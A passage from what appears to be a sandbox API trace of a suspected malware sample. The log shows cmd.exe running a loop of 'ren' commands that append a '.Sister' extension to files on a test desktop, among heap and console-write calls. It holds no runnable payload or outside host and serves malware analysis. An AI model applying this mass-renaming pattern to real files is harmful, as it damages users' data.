lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.712] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.712] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0202.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.712] GetFileType (hFile=0x50) returned 0x2 [0202.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.712] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.713] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0202.713] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0202.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.713] GetFileType (hFile=0x50) returned 0x2 [0202.713] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.713] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.714] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0202.714] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0202.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.714] GetFileType (hFile=0x50) returned 0x2 [0202.714] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.714] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.715] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0202.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.720] GetFileType (hFile=0x50) returned 0x2 [0202.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.720] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.721] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9578860*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9578860*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.721] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"zfOV4.swf.Sister\" \"zfOV4.bat\" ") returned 32 [0202.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.721] GetFileType (hFile=0x50) returned 0x2 [0202.721] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.721] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.722] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0202.722] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0202.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.722] GetFileType (hFile=0x50) returned 0x2 [0202.722] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.722] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0202.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.722] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0202.726] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.727] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.727] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.727] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.727] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.727] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.727] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.727] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.727] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.727] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.727] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.727] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.727] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.727] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.727] ??_V@YAXPEAX@Z () returned 0x1 [0202.727] GetProcessHeap () returned 0x21ed8c70000 [0202.727] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d6c510 [0202.727] GetProcessHeap () returned 0x21ed8c70000 [0202.727] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c510, Size=0x50) returned 0x21ed8d6c510 [0202.727] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c510) returned 0x50 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a149a0 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d6de70 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6de70, Size=0x50) returned 0x21ed8d6de70 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6de70) returned 0x50 [0202.728] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.728] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14a00 [0202.728] GetProcessHeap () returned 0x21ed8c70000 [0202.728] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95747d0 [0202.729] _wcsicmp (_String1="zfOV4.swf", _String2=".") returned 76 [0202.729] _wcsicmp (_String1="zfOV4.swf", _String2="..") returned 76 [0202.730] GetFileAttributesW (lpFileName="zfOV4.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf")) returned 0x20 [0202.730] GetProcessHeap () returned 0x21ed8c70000 [0202.730] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a76460 [0202.731] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a76470 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.731] SetErrorMode (uMode=0x0) returned 0x0 [0202.731] SetErrorMode (uMode=0x1) returned 0x0 [0202.731] GetFullPathNameW (in: lpFileName="zfOV4.swf", nBufferLength=0x7fe7, lpBuffer=0x21ed975fcc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf", lpFilePart=0xa6cf4fd660*="zfOV4.swf") returned 0x21 [0202.731] SetErrorMode (uMode=0x0) returned 0x1 [0202.731] GetProcessHeap () returned 0x21ed8c70000 [0202.731] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9574080 [0202.731] _wcsicmp (_String1="zfOV4.swf", _String2=".") returned 76 [0202.731] _wcsicmp (_String1="zfOV4.swf", _String2="..") returned 76 [0202.732] GetFileAttributesW (lpFileName="zfOV4.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf")) returned 0x20 [0202.732] ??_V@YAXPEAX@Z () returned 0x1 [0202.732] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.732] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.732] malloc (_Size=0xffce) returned 0x21ed976fca0 [0202.732] ??_V@YAXPEAX@Z () returned 0x21ed976fca0 [0202.732] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf")) returned 0x20 [0202.732] malloc (_Size=0xffce) returned 0x21ed977fc80 [0202.732] ??_V@YAXPEAX@Z () returned 0x21ed977fc80 [0202.732] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf", fInfoLevelId=0x1, lpFindFileData=0x21ed95747e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed95747e0) returned 0x21ed9a14460 [0202.732] malloc (_Size=0xffce) returned 0x21ed978fc60 [0202.732] ??_V@YAXPEAX@Z () returned 0x21ed978fc60 [0202.733] ??_V@YAXPEAX@Z () returned 0x1 [0202.733] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\zfov4.swf.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0202.734] FindNextFileW (in: hFindFile=0x21ed9a14460, lpFindFileData=0x21ed95747e0 | out: lpFindFileData=0x21ed95747e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057, dwReserved0=0x0, dwReserved1=0x0, cFileName="zfOV4.swf", cAlternateFileName="")) returned 0 [0202.735] GetLastError () returned 0x12 [0202.735] FindClose (in: hFindFile=0x21ed9a14460 | out: hFindFile=0x21ed9a14460) returned 1 [0202.735] ??_V@YAXPEAX@Z () returned 0x1 [0202.735] ??_V@YAXPEAX@Z () returned 0x1 [0202.735] ??_V@YAXPEAX@Z () returned 0x1 [0202.735] ??_V@YAXPEAX@Z () returned 0x1 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14a60 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c955e0, Size=0x16) returned 0x21ed8c95760 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95760) returned 0x16 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0202.737] GetProcessHeap () returned 0x21ed8c70000 [0202.737] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6d3c0 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d3c0, Size=0xb2) returned 0x21ed8d6d3c0 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d3c0) returned 0xb2 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95789b0 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95789b0, Size=0x30) returned 0x21ed95789b0 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95789b0) returned 0x30 [0202.738] GetProcessHeap () returned 0x21ed8c70000 [0202.738] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95789f0 [0202.738] malloc (_Size=0x1ff9c) returned 0x21ed975fcc0 [0202.741] GetProcessHeap () returned 0x21ed8c70000 [0202.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9572fc0 [0202.741] GetProcessHeap () returned 0x21ed8c70000 [0202.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9571d00 [0202.741] ??_V@YAXPEAX@Z () returned 0x1 [0202.741] malloc (_Size=0x1ff9c) returned 0x21ed975fcc0 [0202.741] GetProcessHeap () returned 0x21ed8c70000 [0202.742] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9572c00 [0202.742] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed975fcc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0202.742] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14be0 [0202.742] FindClose (in: hFindFile=0x21ed9a14be0 | out: hFindFile=0x21ed9a14be0) returned 1 [0202.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14ac0 [0202.742] FindClose (in: hFindFile=0x21ed9a14ac0 | out: hFindFile=0x21ed9a14ac0) returned 1 [0202.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa372679a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa372679a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14ac0 [0202.742] FindClose (in: hFindFile=0x21ed9a14ac0 | out: hFindFile=0x21ed9a14ac0) returned 1 [0202.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa372679a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa372679a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xea3ae5a1, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0202.743] malloc (_Size=0x1ff9c) returned 0x21ed977fc70 [0202.743] ??_V@YAXPEAX@Z () returned 0x21ed977fc70 [0202.744] GetProcessHeap () returned 0x21ed8c70000 [0202.744] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d673b0 [0202.744] ??_V@YAXPEAX@Z () returned 0x1 [0202.744] ??_V@YAXPEAX@Z () returned 0x1 [0202.744] GetProcessHeap () returned 0x21ed8c70000 [0202.744] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95789f0, Size=0x490) returned 0x21ed95789f0 [0202.744] GetProcessHeap () returned 0x21ed8c70000 [0202.744] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95789f0) returned 0x490 [0202.744] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0202.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.744] GetFileType (hFile=0x50) returned 0x2 [0202.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.744] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0202.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.744] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0202.750] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.750] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.750] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0202.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.750] GetFileType (hFile=0x50) returned 0x2 [0202.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.750] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0202.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.751] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0202.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.751] GetFileType (hFile=0x50) returned 0x2 [0202.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.751] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.752] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed95789c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed95789c0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0202.752] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0202.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.752] GetFileType (hFile=0x50) returned 0x2 [0202.752] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.753] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0202.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.753] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0202.758] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0202.758] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.758] GetFileType (hFile=0x50) returned 0x2 [0202.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.758] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.759] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.759] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0202.762] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.763] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.763] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.764] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.764] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.764] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.764] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.764] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.764] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.764] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.764] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.764] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.764] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.764] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.764] ??_V@YAXPEAX@Z () returned 0x1 [0202.764] GetProcessHeap () returned 0x21ed8c70000 [0202.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d7f0 [0202.765] GetProcessHeap () returned 0x21ed8c70000 [0202.765] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d7f0, Size=0x130) returned 0x21ed8d6d7f0 [0202.765] GetProcessHeap () returned 0x21ed8c70000 [0202.765] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d7f0) returned 0x130 [0202.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.765] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.765] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.765] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed975fcc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.766] ??_V@YAXPEAX@Z () returned 0x1 [0202.766] GetProcessHeap () returned 0x21ed8c70000 [0202.766] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6bcf0 [0202.770] GetProcessHeap () returned 0x21ed8c70000 [0202.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d930 [0202.770] GetProcessHeap () returned 0x21ed8c70000 [0202.770] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d930, Size=0x130) returned 0x21ed8d6d930 [0202.770] GetProcessHeap () returned 0x21ed8c70000 [0202.770] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d930) returned 0x130 [0202.770] malloc (_Size=0xffce) returned 0x21ed975fcc0 [0202.770] ??_V@YAXPEAX@Z () returned 0x21ed975fcc0 [0202.770] GetProcessHeap () returned 0x21ed8c70000 [0202.770] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14880 [0202.771] GetProcessHeap () returned 0x21ed8c70000 [0202.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9575dc0 [0202.771] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.771] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.771] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: 